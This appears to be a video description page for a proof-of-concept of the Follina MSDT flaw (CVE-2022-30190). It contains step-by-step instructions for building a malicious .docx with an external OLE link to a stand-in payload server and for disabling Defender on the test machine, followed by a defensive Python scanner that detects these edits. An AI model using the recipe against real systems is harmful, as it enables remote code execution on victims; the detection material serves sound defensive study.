Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina'


In today's cyber episode: Thorough POC MSDT 0-Day CVE-2022-30190 'Follina'

MS Office docx files may contain external OLE Object references as HTML files. There is a URL scheme, "ms-msdt:", which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

0:00 ⏩ Intro
0:10 ⏩ Creating the DOCX file on Win10
2:51 ⏩ Creating the payload calling "Calc.exe" on Kali Linux
3:53 ⏩ Executing the malicious DOCX on a Win10 machine

Proof of Concept Steps (PoC)
==================================
1. Open Word (used up-to-date 2019 Pro), create a dummy document, insert an (OLE) object as a Bitmap Image, save it as docx.
2. Open it with 7zip, navigate to "word/_rels" and edit "document.xml.rels". Search for Type="https://ift.tt/MYibyJz" and change:
   Target="embeddings/oleObject1.bin"
   TO
   Target="http://*payload_server*/payload.html!"
   Add TargetMode = "External"
3. Navigate to "word/" and edit "document.xml". Search for "OLEObject", change the attribute Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall".

*** ATTACKING MACHINE ***
4. Copy "exploit.html" and paste it into a text editor, saving it as "payload.html".
5. Type "python3 -m http.server" to host a local webserver.
6. Check in the browser that the webserver is UP by typing its IP:PORT (payload.html should be there).

*** WIN10 MACHINE ***
7. Disable MS Defender to run the PoC (MS Defender is detecting it).
8. Open the Doc1.docx.

Links & Sources
==================================
https://ift.tt/w18aLgC
https://ift.tt/OMxvYXc

Stay tuned!
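A defender-side check for the document changes made in steps 2 and 3, as an added example that is not part of the original post or video: it flags any oleObject relationship with TargetMode="External" and reports whether the matching OLEObject element was switched to Type="Link". The function names, the sample host `payload-server.example` and the two sample files are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted files, prefer a hardened parser such as defusedxml

PKG = "{http://schemas.openxmlformats.org/package/2006/relationships}"
R_ID = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id"
OLE = "{urn:schemas-microsoft-com:office:office}OLEObject"

def _part(z, name):
    # Parse one zip member as XML, or return an empty element if it is absent.
    return ET.fromstring(z.read(name)) if name in z.namelist() else ET.Element("none")

def scan_docx(data):
    """Return one finding per external oleObject relationship in a .docx given as bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        rels = _part(z, "word/_rels/document.xml.rels")
        doc = _part(z, "word/document.xml")
    # OLEObject elements changed from Type="Embed" to Type="Link" (step 3), keyed by r:id
    linked = {o.get(R_ID): o.get("UpdateMode") for o in doc.iter(OLE) if o.get("Type") == "Link"}
    findings = []
    for rel in rels.iter(PKG + "Relationship"):
        external = rel.get("TargetMode", "").lower() == "external"
        if external and rel.get("Type", "").endswith("/oleObject"):
            rid = rel.get("Id")
            findings.append({"id": rid, "target": rel.get("Target"),
                             "linked": rid in linked, "update_mode": linked.get(rid)})
    return findings

def _make_docx(rel_attrs, ole_attrs):
    """Constructed sample: only the two parts the scanner reads, not a full document."""
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/'
            '2006/relationships/oleObject" %s/></Relationships>' % rel_attrs)
    doc = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
           'xmlns:o="urn:schemas-microsoft-com:office:office" '
           'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
           '<o:OLEObject r:id="rId5" %s/></w:document>' % ole_attrs)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
        z.writestr("word/document.xml", doc)
    return buf.getvalue()

BENIGN = _make_docx('Target="embeddings/oleObject1.bin"', 'Type="Embed"')
SUSPECT = _make_docx('Target="http://payload-server.example/payload.html!" TargetMode="External"',
                     'Type="Link" UpdateMode="OnCall"')

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_docx(sample))
```

An external oleObject relationship is worth triaging even when `linked` is false, since the relationship alone already points the document at a remote resource.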

Hello and welcome to the temple of cybersecurity. Now you are watching Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina' published at June 1, 2022 at 06:41PM.